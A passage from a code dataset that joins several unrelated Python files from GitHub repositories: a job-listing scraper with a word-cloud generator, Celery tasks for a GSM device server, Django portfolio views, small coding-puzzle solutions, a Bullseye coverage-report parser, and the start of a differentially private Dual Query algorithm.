#保存网址到zhaopin.txt\n findask(zhaopin) #寻找招聘要求\n creatwordcloud(jobs,city) # 生成词云\n\n\n\n#保存招聘网址\ndef saveData(zhaopin):\n filepath = \"zhaopin.txt\"\n f = open(filepath,\"w\")\n for i in range(len(zhaopin)):\n f.write(zhaopin[i]+'\\n')\n f.close()\n\n\ndef findask(zhaopin):\n require = []\n f = open(\"ask.txt\",\"w\")\n for i in range(len(zhaopin)):\n urls = zhaopin[i]\n html = askurl(urls)\n #print(html)\n soup = BeautifulSoup(html,\"html.parser\")\n for item in soup.find_all('div',class_=\"job-item main-message job-description\"):\n item = str(item)\n ask = re.findall(asklink, item)\n ask = str(ask)\n #print(ask)\n ask = re.sub(\"[\\[\\]\\']\",\"\",ask)\n ask = ask.replace(\"
\",'\\n')\n ask = ask.replace(r\"\\r\\n\",\"\")\n ask = ask.replace(r'\\n',\"\")\n ask = ask.replace(r\"\\t\",\"\")\n f.write(ask.encode(\"gbk\",\"ignore\").decode(\"gbk\",\"ignore\"))\n f.write('\\n')\n require.append(ask)\n f.close()\n\n clean(require)#清洗数据\n\ndef clean(require):\n f = open(\"last.txt\",\"w\")\n #f1 = open(\"keywords.txt\",\"w\")\n for i in range(len(require)):\n # 去除序号与结尾\n require[i] = re.sub(r'([0-9 a-z]+[\\.\\、,,))])|( [0-9]+ )|[;;]', '',require[i])\n # 去除不重要的标点\n require[i] = re.sub(r'[,、。【】()/]', ' ',require[i])\n require[i] = require[i].replace(\"xa0\",\"\")\n f.write(require[i].encode(\"gbk\",\"ignore\").decode(\"gbk\",\"ignore\"))\n f.close()\n\n #require = str(require)\n # # 筛选TF-IDF\n # keywords = jieba.analyse.extract_tags(require, topK=100, withWeight = False)\n # f1.write(str(keywords))\n\n #f1.close()\n\ndef creatwordcloud(jobs,city):\n f = open(\"last.txt\",\"r\").read()\n\n # 筛选TF-IDF\n keywords = jieba.analyse.extract_tags(f, topK=100, withWeight=False)\n keywords = str(keywords)\n keywords = re.sub(\"[\\[\\]\\']\",\"\",keywords)\n\n #用关键词生成词云\n img = Image.open('底布.png')\n img_array = np.array(img)\n font_path = \"C:\\Windows\\Fonts\\simfang.ttf\"\n cloud = WordCloud(font_path = font_path,\n background_color = 'white',\n mask = img_array).generate(keywords)\n\n #绘制图片\n fig = plt.figure(1)\n plt.imshow(cloud)\n plt.axis\n cloud.to_file('%s%s.jpg'%(jobs,city))\n\nif __name__ == '__main__':\n main()\n","repo_name":"whut66666/findjob","sub_path":"liepin/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4290787816","text":"from __future__ import absolute_import, unicode_literals\nimport logging\nfrom celery import task\n\nfrom django.utils import timezone\nfrom datetime import timedelta\n\nfrom apps.devices.models import Device, LogAction, LogDevice\nfrom apps.rules.models import Rule\nfrom apps.rules.constants import RULE_TYPE_DEVICE, RULE_TYPE_ACTION\n\nfrom server.redis_lock import Lock\n\n\n#\n# PERIODIC TASKS\n#\n@task() # 25 Segs\ndef update_status(id):\n logging.info(\"UPDATE STATUS {}\".format(id))\n # Acorto retry y delay para que basicamente\n # ignoremos la task asi no se apilan\n try:\n with Lock('TASK_DEVICE_ID_%d' % id, 4000, 0, 0.2):\n device = Device.objects.get(id=id)\n device.update_status()\n except Exception as e:\n logging.error(\"UPDATE_STATUS device %d, error %s\" % (id, e))\n\n\n@task() # 5 Mins / No ejecutar al mismo tiempo que update_status\ndef check_new_sms(id):\n logging.info(\"CHECK NEW SMS {}\".format(id))\n try:\n with Lock('TASK_DEVICE_ID_%d' % id, 60000):\n device = Device.objects.get(id=id)\n device.check_new_sms()\n except Exception as e:\n logging.error(\"CHECK_NEW_SMS device %d, error %s\" % (id, e))\n\n\n@task() # Una vez al dia / No ejecutar al mismo tiempo que update_status\ndef delete_sms(id):\n #\n # MAXIMO DE SMS = 30, DESPUES GUARDA EN OTROS LADOS\n #\n logging.info(\"DELETE SMS {}\".format(id))\n try:\n with Lock('TASK_DEVICE_ID_%d' % id, 60000):\n device = Device.objects.get(id=id)\n device.delete_sms()\n except Exception as e:\n logging.error(\"DELETE_SMS device %d, error %s\" % (id, e))\n\n\n#\n# EXECUTE LOGS DEVICES / ACTIONS\n#\n@task(\n max_retries=3,\n default_retry_delay=2 * 60,\n autoretry_for=(Exception,)\n)\ndef treat_log_device(action_id):\n logging.info(\"TREAT LOG DEVICE {}\".format(action_id))\n try:\n log = LogDevice.objects.get(id=action_id)\n if log.can_treat():\n log.treat_log()\n if log.status != 'OK':\n raise Exception(\"Status is not finish\")\n except Exception as e:\n logging.error(\"TREAT_LOG_DEVICE action %d, error %s\" % (action_id, e))\n raise e\n\n\n@task(\n max_retries=3,\n default_retry_delay=2 * 60,\n autoretry_for=(Exception,)\n)\ndef execute_action(action_id):\n logging.info(\"EXECUTE ACTION {}\".format(action_id))\n try:\n action = LogAction.objects.get(id=action_id)\n if action.can_execute():\n action.execute_action()\n if action.status != 'OK':\n raise Exception(\"Status is not finish\")\n except Exception as e:\n logging.error(\"EXECUTE_ACTION action %d, error %s\" % (action_id, e))\n raise e\n\n\n#\n# CHECK LOST LOGS DEVICES / ACTIONS\n#\n@task()\ndef check_pending_log_devices():\n logging.info(\"CHECK PENDING LOGS\")\n date_ini = timezone.now() - timedelta(minutes=50)\n date_from = timezone.now() - timedelta(minutes=10)\n logs = LogDevice.objects.filter(\n status__in=['INI', 'ERR'],\n created_at__gte=date_ini,\n created_at__lte=date_from\n )\n time = 2\n for log in logs:\n treat_log_device.apply_async([log.id], countdown=10 + time)\n time += 5\n\n\n@task()\ndef check_pending_log_actions():\n logging.info(\"CHECK PENDING ACTIONS\")\n date_ini = timezone.now() - timedelta(minutes=50)\n date_from = timezone.now() - timedelta(minutes=10)\n logs = LogAction.objects.filter(\n status__in=['INI', 'ERR'],\n created_at__gte=date_ini,\n created_at__lte=date_from\n )\n time = 2\n for log in logs:\n execute_action.apply_async([log.id], countdown=10 + time)\n time += 5\n\n\n#\n# EXECUTE RULES\n#\n@task()\ndef execute_rule_log_device(log_id):\n logging.info(\"EXECUTE ROLE LOG {}\".format(log_id))\n log = LogDevice.objects.get(id=log_id)\n\n rules = Rule.objects.filter(\n rule_type=RULE_TYPE_DEVICE,\n device=log.device,\n enabled=True\n )\n for rule in rules:\n try:\n rule.check_rule(log)\n except Exception as e:\n logging.error(\"EXECUTE_RULES log_device %d, error %s\" % (log_id, e))\n\n\n@task()\ndef execute_rule_log_action(log_id):\n logging.info(\"EXECUTE ROLE ACTION {}\".format(log_id))\n log = LogAction.objects.get(id=log_id)\n\n rules = Rule.objects.filter(\n rule_type=RULE_TYPE_ACTION,\n device=log.device,\n enabled=True\n )\n for rule in rules:\n try:\n rule.check_rule(log)\n except Exception as e:\n logging.error(\"EXECUTE_RULES log_action %d, error %s\" % (log_id, e))\n","repo_name":"edunola13/server-gsm","sub_path":"apps/devices/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70194089746","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom portfolio.models import send_a_query, newsletteremail, project_details\nfrom portfolio.forms import SendQueryForm, NewsLetterForm\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator\n\n\n\n# List of views\ndef homepage(request):\n context = {\n 'name': 'Welcome Home!',\n 'current_page': ''\n }\n return render(request, 'portfolio/index.html', context)\n\n\ndef contact(request):\n if request.method ==\"POST\":\n if 'sendquerysubmit' in request.POST:\n form = SendQueryForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, (\"Query sent successfully.\"))\n return redirect(\"contact\")\n \n else:\n # import all the queries from database model - contact_details\n all_queries = send_a_query.objects.all().reverse()\n paginator = Paginator(all_queries, 5) # Show 25 contacts per page.\n\n page_number = request.GET.get('page')\n all_queries = paginator.get_page(page_number)\n \n context = {\n 'name': 'Welcome to Contact Page',\n 'all_queries': all_queries,\n 'current_page': 'Contact'\n }\n return render(request, 'portfolio/contact.html', context)\n\n\ndef projects(request):\n all_projects = project_details.objects.all()\n paginator = Paginator(all_projects, 3) # Show 25 contacts per page.\n\n page_number = request.GET.get('page')\n all_projects = paginator.get_page(page_number)\n context = {\n 'name': 'Project Details',\n 'current_page': 'Projects',\n 'all_projects': all_projects\n }\n return render(request, 'portfolio/projects.html', context)\n\ndef gallery(request):\n context = {\n 'name': 'Welcome to Gallery Page',\n 'current_page': 'Gallery'\n }\n return render(request, 'portfolio/gallery.html', context)\n\n","repo_name":"chanchalkmaurya/chanchal","sub_path":"portfolio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71201619346","text":"# Solution for Leet code problem\r\n# Problem url https://leetcode.com/problems/how-many-numbers-are-smaller-than-the-current-number/\r\n\r\nnums = [8,1,2,2,3]\r\nans=[]\r\nfor i in range(0,len(nums)):\r\n smaller=0\r\n for j in range(0,len(nums)):\r\n if(nums[i]>nums[j]):\r\n smaller=smaller+1\r\n ans.append(smaller)\r\nprint(ans)","repo_name":"harshareddy794/Athmanirbhar-competitive-coding-track","sub_path":"01-06-2020(DAY 1)/How Many Numbers Are Smaller Than the Current Number.py","file_name":"How Many Numbers Are Smaller Than the Current Number.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7618420039","text":"def moveZero(arr,n):\n count = 0 # keep track of Non-zero elements\n \n for i in range(n):\n if arr[i] != 0:\n arr[i],arr[count] = arr[count],arr[i]\n count += 1\n\n return arr\n\nprint (moveZero([8,5,0,10,0,20],6))","repo_name":"shobhit009/Daily-practice-problem","sub_path":"Array/moveZerosAtEnd.py","file_name":"moveZerosAtEnd.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38996038018","text":"#!/usr/bin/env python\n# -*- Mode: Python; indent-tabs-mode: nil; tab-width: 4 -*-\n# vi: set ts=4 sw=4 expandtab: (add to ~/.vimrc: set modeline modelines=5)\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n\n'''\nusage:\n The script parses a bullseye code coverage binary file and generates a list of missing functions, and several csv files\n for use with confluence tables and charts.\n\n requirement for the csv filename output to look correct must run this script with cwd set to the tamarin-redux directory\n\n parsecodecoverage.py --covfile avm.cov --build=5110\n env variables: $coverage_exclude_regions\n\n input:\n --covfile \n --build \n \n output:\n for output files the $basename is the covfile with the .cov removed e.g. avmshell_s_cov_64.cov produces avmshell_s_cov_64-info.csv\n these files are created:\n $basename-info.csv # build number and timestamp\n $basename-summaryfn.csv # function data table for current build for table\n $basename-summarybc.csv # branches/conditions data table for current build for table\n $basename-missingfn.csv # list of uncovered functions\n\n these files are appended:\n $basename-recentfn.csv # uncovered function historical chart for this iteration (month)\n $basename-recentbc.csv # uncovered branch/conditions historical chart for this iteration (month)\n $basename-milestonefn.csv # uncovered function historical chart for recent iterations/milestones\n $basename-milestonebc.csv # uncovered branches/conditions historical chart for recent iterations/milestones\n\n\n bullseye tool must be installed and in the path, covfn is executed from bullseye tested with version 7.13.32\n\n CSV output formats:\n $basename-missingfn.csv format: build,module name,source file name, function name\n $basename-info.csv format (single line): build: ###, updated: YYYY-MM-DD HH:MM\n $basename-summaryfn.csv format: module,uncovered fns,total fns,% fn cov\n $basename-summarygc.csv format: module,uncovered branches,% branch cov,total branches,% branch cov\n\n'''\nimport getopt,os,re,subprocess,sys,datetime\n\nclass ParseCodeCoverage:\n covfile=None\n incsvfile=None\n outcsvfile=None\n\n datadir='./data'\n missingfnfile=None\n info=None\n summary=None\n fnsummary=None\n fnpercentsummary=None\n bcsummary=None\n bcpercentsummary=None\n basefile=None\n modulelist=None\n skips=[]\n bullseyedir=None\n build='unknown'\n\n \n\n options=''\n longOptions=['covfile=','build=','incsvfile=']\n region=''\n\n def __init__(self):\n self.parseOptions()\n\n if os.environ.has_key('coverage_exclude_regions'):\n self.region=os.environ['coverage_exclude_regions']\n \n if os.environ.has_key('bullseyedir')==False:\n print(\"error: must set bullseyedir environment variable to the bullseye/bin directory\")\n sys.exit(1)\n self.bullseyedir=os.environ['bullseyedir']\n\n # if incsvfile not set run covfn to generate the csv file\n if self.incsvfile==None:\n self.runcovfn()\n else:\n self.outcsvfile=self.incsvfile\n\n # parse the csv file into missingfn csv string, and dictionaries: module:fncovered, module:fntotal, \n # module:bccovered, module:bctotal\n csvdata,fnucovered,fntotal,bcucovered,bctotal = self.processCSV()\n self.modulelist=fntotal.keys()\n self.modulelist.sort(key=str.lower)\n\n # write the missing fn csv file\n self.missingfnfile=self.basefile+'-missingfn.csv'\n self.saveCSV(csvdata)\n\n # calculate missing fn diff against milestone\n self.prepareFileForDiff(self.basefile+'-milestone-missingfn.csv')\n self.prepareFileForDiff(self.basefile+'-missingfn.csv')\n cmd=\"diff -U 0 %s %s\" % (self.basefile+'-milestone-missingfn.csv.1',self.basefile+'-missingfn.csv.1')\n process=subprocess.Popen(cmd,shell=True,stdout=open(self.basefile+'-missingfn-diffs.csv','w'),stderr=subprocess.STDOUT)\n (stdout,stderr)=process.communicate()\n\n # write the csv table for current build and csv table with build number and timestamp\n self.info=self.basefile+'-info.csv'\n self.summaryfn=self.basefile+'-summaryfn.csv'\n self.generateSummaryTableFn(fnucovered,fntotal)\n self.summarybc=self.basefile+'-summarybc.csv'\n self.generateSummaryTableBc(bcucovered,bctotal)\n \n self.appendData(self.basefile+'-recentfn.csv',fnucovered,fntotal)\n self.appendData(self.basefile+'-recentbc.csv',bcucovered,bctotal)\n self.appendData(self.basefile+'-milestonefn.csv',fnucovered,fntotal)\n self.appendData(self.basefile+'-milestonebc.csv',bcucovered,bctotal)\n\n print('finished') \n\n def prepareFileForDiff(self,file):\n f=open(file)\n contents=f.read()\n f.close()\n newcontents=''\n lines=contents.split('\\n')\n for line in lines:\n tokens=line.split(',')\n if len(tokens)==0:\n continue\n tokens=tokens[1:]\n newcontents+=\",\".join(tokens)+\"\\n\"\n f=open(file+\".1\",\"w\")\n f.write(newcontents)\n f.close()\n\n def usage(self,c):\n print('usage: %s [options]' % sys.argv[0])\n print(' --covfile set the bullseye .cov file to be processing, assumes bullseye is installed')\n print(' --incsvfile set the csv file to load, the csv is returned by covfn --csv > file.csv,')\n print(' if not set covfn --csv is run')\n print(' --build set the build number')\n sys.exit(c)\n\n def parseOptions(self):\n try:\n opts,args = getopt.getopt(sys.argv[1:], self.options,self.longOptions)\n except:\n print(sys.exc_info()[1])\n self.usage(2)\n\n for o,v in opts:\n if o in ('--covfile'):\n self.covfile=v\n if v.find('.')>-1:\n v=v[0:v.find('.')]\n self.basefile=v\n if o in ('--incsvfile'):\n self.incsvfile=v\n if v.find('.')>-1:\n v=v[0:v.find('.')-1]\n self.basefile=v\n if o in ('--build'):\n self.build=v\n\n if self.covfile==None and self.incsvfile==None:\n print('--covfile or --incsvfile must be set')\n sys.exit(1)\n\n def runcovfn(self):\n outfile=self.basefile+'.csv'\n print('processing .cov binary to %s...' % outfile)\n \n covarg=''\n if self.covfile!=None:\n covarg='--file %s' % self.covfile\n\n cmd='%s/covfn %s --no-banner --csv %s' % (self.bullseyedir,covarg,self.region)\n if os.path.exists(outfile):\n os.unlink(outfile)\n\n process=subprocess.Popen(cmd,shell=True,stdout=open(outfile,'w'),stderr=subprocess.PIPE)\n (stdout,stderr)=process.communicate()\n self.outcsvfile=outfile\n\n def processCSV(self):\n print('parsing %s...' % self.outcsvfile)\n lines=open(self.outcsvfile).read()\n output=\"\"\n # throw away header(1st) and summary(last) lines\n lines=lines.split('\\n')[0:-1]\n uncoveredfncount={}\n totalfncount={}\n uncoveredbccount={}\n totalbccount={}\n output+='build,module,source,function\\n'\n modulefiles={}\n for line in lines:\n tokens=self.mysplit(line)\n if len(tokens)<6:\n continue\n # check if file name contains extra directories\n if tokens[1].find('repo/')>-1:\n tokens[1]=tokens[1][tokens[1].find('repo/')+5:]\n if tokens[1].find('tamarin-redux/')>-1:\n tokens[1]=tokens[1][tokens[1].find('tamarin-redux/')+14:]\n # set module to name before '/'\n module=''\n dirs=re.findall('[A-Za-z0-9_.-]+',tokens[1])\n if len(dirs)>1:\n module=dirs[0]\n else:\n continue\n # skip modules for third-party apis\n if module in self.skips:\n continue\n # check if function is not covered\n if tokens[3]=='0':\n output+='%s,%s,%s,\"%s\"\\n'%(self.build,module,tokens[1],tokens[0])\n if uncoveredfncount.has_key(module)==False:\n uncoveredfncount[module]=0\n uncoveredfncount[module]+=1\n # add to function total\n if totalfncount.has_key(module)==False:\n totalfncount[module]=0\n totalfncount[module]+=1\n # add to b/c covered\n if uncoveredbccount.has_key(module)==False:\n uncoveredbccount[module]=0\n uncoveredbccount[module]+=int(tokens[4])\n # add to b/c total\n if totalbccount.has_key(module)==False:\n totalbccount[module]=0\n totalbccount[module]+=int(tokens[5])\n # flip b/c totals to make uncovered\n for module in uncoveredbccount.keys():\n uncoveredbccount[module]=totalbccount[module]-uncoveredbccount[module]\n return output, uncoveredfncount, totalfncount, uncoveredbccount,totalbccount\n \n\n def saveCSV(self,csvdata):\n print('saving csv data to %s' % self.missingfnfile)\n open(self.missingfnfile,'w').write(csvdata)\n\n def appendData(self,filename,uncovered,total):\n print('appending results to %s' % filename)\n uncoveredsum=0\n totalsum=0\n for module in self.modulelist:\n if uncovered.has_key(module)==False:\n if total.has_key(module)==False:\n print('WARNING: module %s is not in module list' % module)\n continue\n uncoveredsum+=uncovered[module]\n totalsum+=total[module]\n percent=self.calcpercent(uncoveredsum,totalsum)\n if os.path.exists(filename)==False:\n print(\"ERROR: file %s does not exist, generating new file\")\n contents=\"build\\ncore\\nnanojit\\nMMgc\\ngenerated\\nplatform\\nextensions\\nVMPI\\nvmbase\"\n else:\n contents=open(filename).read()\n newcontents=''\n lines=contents.split('\\n')\n for line in lines:\n if line=='':\n continue\n tokens=line.split(',')\n if tokens[0]=='build':\n value=self.build\n elif tokens[0] in self.modulelist==False:\n value=\"0\"\n elif tokens[0]=='total':\n value=percent\n else:\n if uncovered.has_key(tokens[0])==False:\n uncov=0\n else:\n uncov=uncovered[tokens[0]]\n value=self.calcpercent(uncov,total[tokens[0]])\n newcontents+=\"%s,%s\\n\" % (line,value)\n f=open(filename,'w')\n f.write(newcontents)\n f.close()\n\n def generateSummaryTableFn(self,fnuncovered,fntotal):\n print('generating fn summary data...')\n if os.path.exists(self.summaryfn):\n os.unlink(self.summaryfn)\n fnuncoveredsum=0\n fntotalsum=0\n contents='module,uncovered functions,total functions,% function coverage\\n'\n for module in self.modulelist:\n if fnuncovered.has_key(module)==False:\n continue\n fnuncoveredsum+=fnuncovered[module]\n fntotalsum+=fntotal[module]\n contents+='%s,%s,%s,%s%s\\n' % (module,fnuncovered[module],fntotal[module],self.calcpercent(fnuncovered[module],fntotal[module]),'%')\n contents+='total,%s,%s,%s%s\\n' % (fnuncoveredsum,fntotalsum,self.calcpercent(fnuncoveredsum,fntotalsum),'%')\n open(self.summaryfn,'w').write(contents)\n open(self.info,'w').write('current build: %s,function coverage: %s%s' % \n (self.build,\n self.calcpercent(fnuncoveredsum,fntotalsum),'%')\n )\n\n def generateSummaryTableBc(self,bcuncovered,bctotal):\n print('generating bc summary data...')\n if os.path.exists(self.summarybc):\n os.unlink(self.summarybc)\n bcuncoveredsum=0\n bctotalsum=0\n contents='module,uncovered branches,total branches,% branch coverage\\n'\n for module in self.modulelist:\n if bcuncovered.has_key(module)==False:\n continue\n bcuncoveredsum+=bcuncovered[module]\n bctotalsum+=bctotal[module]\n contents+='%s,%s,%s,%s%s\\n' % (module,bcuncovered[module],bctotal[module],self.calcpercent(bcuncovered[module],bctotal[module]),'%')\n contents+='total,%s,%s,%s%s\\n' % (bcuncoveredsum,bctotalsum,self.calcpercent(bcuncoveredsum,bctotalsum),'%')\n open(self.summarybc,'w').write(contents)\n open(self.info,'a').write(',branch coverage: %s%s,updated: %s' % \n (self.calcpercent(bcuncoveredsum,bctotalsum),'%',\n datetime.datetime.today().strftime('%Y-%m-%d %H:%M'))\n )\n\n def generateSummary(self, file, modulescount):\n print('generating summary %s...' % file)\n\n if os.path.exists(file)==False:\n summaryFile=open(file,'w')\n summaryFile.write('build\\n')\n for module in self.modulelist:\n summaryFile.write('%s\\n' % module)\n summaryFile.close()\n\n modules=modulescount.keys()\n modulefile=open(file).read()\n modulefilelistupdated=''\n fieldslen=0\n for line in modulefile.split('\\n'):\n if line=='':\n continue\n # check if historical builds exceed max\n tokens=line.split(',')\n if len(tokens)>self.maxBuilds:\n first=tokens[0]\n tokens=tokens[(len(tokens)-self.maxBuilds+1):]\n tokens.insert(0,first)\n line=\",\".join(tokens)\n if line.startswith('build'):\n modulefileupdated=line+','+self.build+'\\n'\n else:\n fields=line.split(',')\n fieldslen=len(fields)\n if modulescount.has_key(fields[0]):\n modulefileupdated+=\"%s,%s\\n\" % (line,modulescount[fields[0]])\n modules.remove(fields[0])\n\n for newmodule in modules:\n line=newmodule\n for i in range(fieldslen-1):\n line+=',0'\n line='%s,%s\\n' % (line,modulescount[newmodule])\n modulefileupdated+=line\n open(file,'w').write(modulefileupdated)\n\n def generatePercentSummary(self, file, modulescount, totalmodulescount):\n print('generating percent function summary data...')\n\n if os.path.exists(file)==False:\n summaryFile=open(file,'w')\n summaryFile.write('build\\n')\n for module in self.modulelist:\n summaryFile.write('%s\\n' % module)\n summaryFile.close()\n modulefile=open(file).read()\n modulefilelistupdated=''\n fieldslen=0\n modules=modulescount.keys()\n for line in modulefile.split('\\n'):\n if line=='':\n continue\n # check if historical builds exceed max\n tokens=line.split(',')\n if len(tokens)>self.maxBuilds:\n first=tokens[0]\n tokens=tokens[(len(tokens)-self.maxBuilds+1):]\n tokens.insert(0,first)\n line=\",\".join(tokens)\n if line.startswith('build'):\n modulefileupdated=line+','+self.build+'\\n'\n else:\n fields=line.split(',')\n fieldslen=len(fields)\n if modulescount.has_key(fields[0]):\n modulefileupdated+=\"%s,%s\\n\" % (line,self.calcpercent(modulescount[fields[0]],totalmodulescount[fields[0]]))\n modules.remove(fields[0])\n for newmodule in modules:\n line=newmodule\n for i in range(fieldslen-1):\n line+=',0'\n line='%s,%s\\n' % (line,self.calcpercent(modulescount[newmodule],totalmodulescount[newmodule]))\n modulefileupdated+=line\n open(file,'w').write(modulefileupdated)\n \n def calcpercent(self,value,total):\n value=float(value)\n total=float(total)\n pct=(total-value)*100.0/total\n return '%.1f' % pct\n\n # workaround since python split does not allow \" to span multiple tokens\n # \"func1(param1,param)\",\"foo\",\"foo\" would not split correctly\n def mysplit(self,line):\n tokens=[]\n while True:\n if len(line)==0:\n break\n if line[0]=='\"':\n line=line[1:]\n if line.find('\"')==-1:\n tokens.append(line)\n break\n tokens.append(line[0:line.find('\"')])\n line=line[line.find('\"')+2:]\n else:\n if line.find(',')==-1:\n tokens.append(line)\n break\n else:\n tokens.append(line[0:line.find(',')])\n line=line[line.find(',')+1:]\n return tokens \n\nif __name__ == '__main__':\n p = ParseCodeCoverage()\n","repo_name":"adobe-flash/crossbridge","sub_path":"avmplus/build/buildbot/slaves/all/util-parse-codecoverage.py","file_name":"util-parse-codecoverage.py","file_ext":"py","file_size_in_byte":17543,"program_lang":"python","lang":"en","doc_type":"code","stars":538,"dataset":"github-code","pt":"48"} +{"seq_id":"21610110722","text":"import itertools\n\nfrom utils import read_data, get_lines\n\n\ndef checksum(data):\n return sum(max(row) - min(row) for row in data)\n\n\ndef fancy_checksum(data):\n total = 0\n for row in data:\n for pair in itertools.combinations(row, 2):\n a, b = sorted(pair)\n if b % a == 0:\n total += b // a\n\n return total\n\n\ndef run_tests():\n assert checksum([\n [5, 1, 9, 5],\n [7, 5, 3],\n [2, 4, 6, 8],\n ]) == 18\n assert fancy_checksum([\n [5, 9, 2, 8],\n [9, 4, 7, 3],\n [3, 8, 6, 5],\n ]) == 9\n\n\nif __name__ == \"__main__\":\n run_tests()\n print(\"All tests passed\")\n\n data = [\n [int(cell) for cell in line.split()]\n for line in get_lines(read_data(2))\n ]\n print(\"Part 1: {}\".format(checksum(data)))\n print(\"Part 2: {}\".format(fancy_checksum(data)))\n","repo_name":"julianandrews/adventofcode","sub_path":"2017/d02.py","file_name":"d02.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"24118643317","text":"\"\"\" This is the main code for Dual Query Algorithm\"\"\"\nimport itertools\nimport json\nfrom pathlib import Path\nfrom pickle import dump, load\nfrom sys import argv\nfrom time import time, strftime\n\nimport pulp\nimport numpy as np\n\n\ntraining_qcache = {}\ntest_qcache = {}\n\n\ndef create_dataset(n, nbits):\n \"\"\" Create Synthetic Dataset\n\n Args:\n n: Number of rows in dataset\n nbits: Number of columns in dataset\n\n Returns:\n The dataset as a list of lists. \n \"\"\"\n D = []\n for _ in range(n):\n # generate 1 row\n D.append(np.random.randint(2, size=nbits))\n\n return D\n\ndef nC3(n):\n \"\"\" Computes n choose 3 \"\"\" \n return (n * (n-1) * (n-2)) // 6\n\ndef sample_queries(Q, Qdist, samples):\n \"\"\" Sample the queries from Query set according to the Query Distribution\n\n Args:\n Q: Query set\n Qdist: Query Distribution\n samples: Number of queries to be sampled\n\n Returns:\n List of sampled queries\n \"\"\" \n result = []\n # since np.random.choice can only sample from 1D array, we use indices\n queries = list(range(len(Q)))\n for _ in range(int(samples)):\n # pick a random index based on Qdist and take the query at that index\n result.append(Q[np.random.choice(queries, p=Qdist)])\n return result\n\ndef query_3marginal(row, query):\n \"\"\" Run a 3 marginal query on a row\n\n Args:\n row: row from dataset\n query: query to run\n\n Returns:\n 1 if row satisfies query, 0 otherwise\n \"\"\" \n result = 1\n # Query Format: {sign, column1, column2, column3, complement1, complement2, complement3}\n # run for each column\n for i in range(3):\n # get column number\n col = query[1 + i]\n # get corresponding complement bit (1 if complement 0 if not)\n complement = query[4 + i]\n # the result is 1 only if the bit at column and complement bit differ\n # this can be done by taking XOR\n result &= int(row[col]) ^ complement\n # flip the result if sign bit is set otherwise don't\n return result ^ 1 if query[0] else result\n\ndef query_3marginal_db(D, query):\n \"\"\" Run a 3 marginal query on Dataset\n\n Args:\n D: Dataset\n query: query to run\n\n Returns:\n Normalized result between 0 and 1\n \"\"\" \n # run query on each row and normalize the result\n return sum([query_3marginal(row, query) for row in D]) / len(D)\n\ndef query_3marginal_db_cached(query, cache):\n \"\"\" Run a 3 marginal query on Dataset using cache\n\n Args:\n query: query to run\n cache: a cached dictionary mapping query to corresponding result on dataset\n\n Returns:\n Normalized result between 0 and 1\n \"\"\" \n return cache[query]\n\ndef payoff(D, q, x):\n \"\"\" Calculate payoff using equation q(x) - q(D)\n\n Args:\n D: Dataset\n q: query to run\n x: a row from dataset\n\n Returns:\n payoff between -1 and 1\n \"\"\" \n return query_3marginal(x, q) - query_3marginal_db_cached(q, training_qcache)\n\ndef get_queries(nqueries, nbits):\n \"\"\" Generate random 3-Marginal queries\n Query Format: {sign, column1, column2, column3, complement1, complement2, complement3}\n\n Args:\n nqueries: number of queries to be generated\n nbits: number of columns in dataset\n\n Returns:\n Two lists of queries, first for training(70%) and second for testing(30%)\n \"\"\" \n result = []\n\n signs = [0, 1]\n columns = set()\n # generate unique triplet of unique columns\n while len(columns) < nqueries:\n triple = set()\n while len(triple) < 3:\n triple.add(np.random.randint(nbits))\n triple = sorted(triple)\n columns.add(tuple(triple))\n\n # split column set into training(70%) and test(30%)\n columns = list(columns)\n split_index = int(0.7 * nqueries)\n training, test = columns[:split_index], columns[split_index:]\n\n \n results = [training, test]\n for i in range(len(results)):\n datasplit = results[i]\n # generate all complements [0 0 0] to [1 1 1]\n complements = itertools.product(range(2), repeat=3)\n # take cross product of datasplit with complement to concatenate\n # each row of complement to each triplet in datasplit\n result = itertools.product(datasplit, complements)\n # do similar procedure to concatenate sign with result,\n result = list(itertools.product(signs, result))\n # currently each element in result is not flattened but is a list of tuples\n # Now flatten each element in the result so that it conforms to query format\n results[i] = [tuple([x[0]] + list(itertools.chain(*x[1]))) for x in result]\n\n return results[0], results[1]\n\ndef run_experiment(eta, steps, samples, D, Q, Qtest):\n \"\"\" Execute a single run of the algorithm for given parameters\n\n Args:\n eta: learning rate eta\n steps: number of iterations / number of rows generated in output dataset\n samples: number of queries to be sampled from query set\n D: Original Dataset\n Q: Query set\n Qtest: Set of queries to test accuracy\n\n Returns:\n A dictionary of average error, max error and runtime\n \"\"\" \n\n n = len(D)\n # initialize Query distribution as uniform distribution\n Qdist = np.array([1/len(Q) for _ in range(len(Q))])\n print('steps =', steps, 'eta =', eta, 'samples =', samples)\n\n synthetic_db = []\n start = time()\n for t in range(steps):\n print('step {:3d}/{}'.format(t + 1, steps), end='\\r', flush=True)\n sampled_queries = np.array(sample_queries(Q, Qdist, samples))\n\n # count number of positive and negative queries\n npositive = nnegative = 0\n for query in sampled_queries:\n if query[0]:\n nnegative += 1\n else:\n npositive += 1\n\n # create model and variables for the model\n model = pulp.LpProblem('Dual Query', pulp.LpMaximize)\n x = np.array([pulp.LpVariable('x' + str(i), cat='Binary') for i in range(nbits)])\n c = np.array([pulp.LpVariable('c' + str(i), cat='Binary') for i in range(npositive)])\n d = np.array([pulp.LpVariable('d' + str(i), cat='Binary') for i in range(nnegative)])\n\n model += sum(c) + sum(d), 'Objective 